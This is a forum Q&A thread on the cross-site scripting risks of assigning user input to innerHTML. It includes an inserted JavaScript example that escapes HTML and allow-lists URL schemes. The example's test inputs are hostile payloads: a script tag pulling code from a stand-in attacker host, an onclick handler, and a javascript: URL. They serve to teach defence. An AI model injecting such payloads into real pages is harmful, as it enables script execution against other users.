Vulnerabilities of allowing a user to define innerHTML

Let's say I have a <textarea> and a <div> element, and when the user puts HTML, CSS (or whatever they want) in the text box, their input is set as the innerHTML of the <div> using JavaScript.

What are the vulnerabilities of allowing a user to define the contents of a <div> element?

+6
4 answers

If the content they enter does not leave the page, there is no more risk than them editing the DOM via Firebug or the Chrome inspector. If you take the input and then show it as it is, this is a huge security risk, especially when other users are on your website.

+3

Well, if you encode the content so that any JavaScript in it does not execute, it should be safe.

If you do not, the user can download javascript, which will be executed the next time another user views this page.

I want to change my answer to take into account @Brigham's comments. Escaping only works reliably if you are dealing with the innerHTML of something like a div tag; if you are using a user-generated value as an attribute or in a script tag, then escaping / encoding will not work.

I will refer you to the OWASP XSS guide (which @Brigham originally brought to my attention) for more information: https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet#Untrusted_Data

+1
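The distinction drawn in the answer above, between encoding for element content and handling a value used in an attribute, shown as an added example that is not part of the original answers. The function names, the sample inputs and the `example.invalid` base URL are assumptions made for illustration.

```javascript
// Added example (not from the original thread). Runs in Node; no DOM needed.

// Encode the characters that are significant in HTML element content
// and in quoted attribute values.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Context 1: element content, e.g. div.innerHTML = renderInDiv(input).
// In a browser, div.textContent = input gives the same result without
// building an HTML string at all.
function renderInDiv(input) {
  return '<div>' + escapeHtml(input) + '</div>';
}

// Context 2: a URL attribute. Entity-encoding alone does not help here,
// because a scheme such as javascript: contains no characters that
// escapeHtml changes. Allow-list the scheme, then encode for the attribute.
function renderLink(url) {
  let parsed;
  try {
    parsed = new URL(url, 'https://example.invalid/'); // placeholder base URL
  } catch {
    return null; // not parseable as a URL
  }
  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') return null;
  return '<a href="' + escapeHtml(parsed.href) + '">link</a>';
}

// Constructed sample inputs.
const markup = '<script src="https://attacker.example/x.js"></script>' +
               '<b onclick="alert(1)">hi</b>';
const schemeUrl = 'javascript:alert(1)';

console.log(renderInDiv(markup));                    // markup shown as inert text
console.log(escapeHtml(schemeUrl) === schemeUrl);    // encoding left it unchanged
console.log(renderLink(schemeUrl));                  // rejected by the allow-list
console.log(renderLink('https://example.com/a?b=1&c=2'));
```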

The user can perform cross-site scripting. They can enter client-side malware.

Take a look at http://en.wikipedia.org/wiki/Cross-site_scripting

0

Whatever they want can include a <script>, which pulls a .js file from their own server. Then, if you show this content to another user, the script can do all kinds of things to extract information from an unsuspecting user.

0

Source: https://habr.com/ru/post/886933/
